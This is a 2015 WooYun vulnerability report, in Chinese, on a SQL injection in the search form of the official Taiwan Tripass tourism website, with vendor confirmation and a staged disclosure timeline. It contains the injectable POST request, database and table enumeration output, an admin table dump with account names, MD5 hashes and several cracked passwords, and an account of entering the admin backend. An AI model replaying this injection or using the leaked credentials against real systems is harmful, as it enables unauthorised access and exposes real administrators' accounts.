当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159580

漏洞标题:台灣好行官方網站sql注入漏洞(涉及16个管理员已解密/已入管理员后台/可操控全部旅程/时间+路线+景点)(臺灣地區)

相关厂商:台灣好行官方網站

漏洞作者: 路人甲

提交时间:2015-12-09 12:47

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-09: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开

简要描述:

属于台湾省交通部觀光局的,有google绿标

详细说明:

台灣好行官方網站
主页搜索的地方post注入

http://**.**.**.**/Search/Do/


post包

POST /Search/Do/ HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/Main/Lang/?redirect=/Main/Index/&lang=zh-tw
Cookie: PHPSESSID=tp835upbb4qopb5gqo13q3bsu5; __utma=118975756.14135579.1449631688.1449631688.1449631688.1; __utmb=118975**.**.**.**9631688; __utmc=118975756; __utmz=118975756.1449631688.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
search_word=1


[11:32:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0
[11:32:52] [INFO] fetching current user
[11:32:53] [INFO] retrieved: TBROC26@localhost
current user:    'TBROC26@localhost'


dbs

available databases [2]:
[*] information_schema
[*] TBROC26


Database: TBROC26
[57 tables]
+-------------------------+
| besttour_busstops       |
| file                    |
| tt_acl_ctrl             |
| tt_admin_group          |
| tt_admin_group_acl      |
| tt_admin_menu           |
| tt_admin_menu_group     |
| tt_admin_menu_group2    |
| tt_admin_response       |
| tt_admin_user           |
| tt_admin_user_old       |
| tt_banner               |
| tt_besttour             |
| tt_besttour_busstops    |
| tt_besttour_bustimes    |
| tt_besttour_direction   |
| tt_besttour_scene       |
| tt_besttour_service     |
| tt_besttour_service2    |
| tt_besttour_time        |
| tt_besttour_time_link   |
| tt_besttour_traffic     |
| tt_controller_action    |
| tt_event_register       |
| tt_file                 |
| tt_group                |
| tt_group_acl            |
| tt_guestbook            |
| tt_i18n                 |
| tt_i18n_data            |
| tt_key_word             |
| tt_lang                 |
| tt_link                 |
| tt_lottery              |
| tt_news                 |
| tt_o_admin_menu         |
| tt_o_admin_user         |
| tt_o_file               |
| tt_playtour             |
| tt_playtour_scene       |
| tt_qa                   |
| tt_qa_cate              |
| tt_scene                |
| tt_setting              |
| tt_station              |
| tt_station_map          |
| tt_station_time         |
| tt_system               |
| tt_taiwantrip_set       |
| tt_ticket_link          |
| tt_time_link            |
| tt_tour_date_type       |
| tt_tour_time            |
| tt_train_xml            |
| tt_weather              |
| tt_weather_week         |
| zdrop_besttour_busstops |
+-------------------------+


涉及手机 邮箱 用户 密码 登入ip.......

+---------------+---------------------+
| Column        | Type                |
+---------------+---------------------+
| account       | varchar(16)         |
| admin_user_id | int(10) unsigned    |
| avatar        | int(11) unsigned    |
| besttour_id   | varchar(255)        |
| create_time   | timestamp           |
| disabled      | enum('T','F')       |
| email         | varchar(32)         |
| group_id      | tinyint(3) unsigned |
| last_login    | datetime            |
| modify_time   | datetime            |
| name          | varchar(16)         |
| password      | varchar(32)         |
| removed       | enum('T','F')       |
| sid           | varchar(32)         |
| super         | enum('T','F')       |
| user_agent    | varchar(255)        |
| user_ip       | varchar(15)         |
+---------------+---------------------+


帐号密码,大部分都解密了

----+--------+-------------------------------------------+---------+---------+--
-----+------------+---------+
| account | admin_user_id | avatar | besttour_id | create_time         | disable
d | email                    | group_id | last_login          | modify_time
    | name   | password                                  | removed | sid     | s
uper | user_agent | user_ip |
+---------+---------------+--------+-------------+---------------------+--------
--+--------------------------+----------+---------------------+-----------------
----+--------+-------------------------------------------+---------+---------+--
-----+------------+---------+
| admin   | 1             | 0      | NULL        | 2010-07-28 14:37:45 | F
  | admin@**.**.**.** | 1        | 2010-08-02 16:03:18 | 2010-07-28 23:04
:46 | ?????  | 827ccb0eea8a706c4c34a16891f84e7b (12345)  | F       | <blank> | T
     | <blank>    | <blank> |
| tirme   | 2             | 0      | NULL        | 2010-07-28 23:06:14 | F
  | tirme@**.**.**.** | 1        | 2010-07-28 23:12:01 | 2010-07-29 02:56
:17 | ???    | d41d8cd98f00b204e9800998ecf8427e          | F       | <blank> | F
     | <blank>    | <blank> |
| winny   | 3             | 0      | NULL        | 2010-08-14 21:47:31 | F
  | winny@**.**.**.** | 1        | 0000-00-00 00:00:00 | 2010-08-14 21:47
:31 | winny  | 4297f44b13955235245b2497399d7a93 (123123) | F       | <blank> | F
     | <blank>    | <blank> |
| tbroc   | 5             | 0      | NULL        | 2010-09-07 23:17:51 | F
  | b213999@**.**.**.**     | 4        | 0000-00-00 00:00:00 | 2010-09-07 23:17
:51 | tbroc  | 0221d64d9a8accf56122e74cb36940b6          | F       | <blank> | F
     | <blank>    | <blank> |
| jeremy  | 6             | 0      | NULL        | 2010-09-28 12:18:37 | F
  | arkly365@**.**.**.**     | 1        | 0000-00-00 00:00:00 | 2011-07-01 11:20
:50 | jeremy | 827ccb0eea8a706c4c34a16891f84e7b (12345)  | F       | <blank> | F
     | <blank>    | <blank> |
| clair   | 7             | 0      | NULL        | 2011-06-21 11:52:40 | F
  | clair@**.**.**.** | 1        | 0000-00-00 00:00:00 | 2011-06-21 11:52
:40 | clair  | e10adc3949ba59abbe56e057f20f883e (123456) | F       | <blank> | F
     | <blank>    | <blank> |
| yoyo    | 8             | 0      | NULL        | 2011-07-04 14:47:40 | F
  | yoyo@**.**.**.**  | 1        | 0000-00-00 00:00:00 | 2011-07-04 14:47
:40 | yoyo   | e10adc3949ba59abbe56e057f20f883e (123456) | F       | <blank> | F
     | <blank>    | <blank> |
| yumin   | 9             | 0      | NULL        | 2011-07-20 10:41:32 | F
  | yumin@**.**.**.**        | 5        | 0000-00-00 00:00:00 | 2011-07-20 10:41
:32 | yumin  | e10adc3949ba59abbe56e057f20f883e (123456) | F       | <blank> | F
     | <blank>    | <blank> |
+---------+---------------+--------+-------------+---------------------+--------
--+--------------------------+----------+---------------------+-----------------
----+--------+-------------------------------------------+---------+---------+--
-----+------------+---------+


扫了一圈没发现后台
后来试试了/admin/
结果自己跳出来了后台登入页面

@AIV8A%1FX(4Q0LRKS)NGJW.png


通过注入密码,已入后台,可以管理留言
严重的是管理全部路线,全部行程分配

~@M4RNN%@_$8{HOKE[W$187.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-14 03:53

厂商回复:

感謝通報

最新状态:

暂无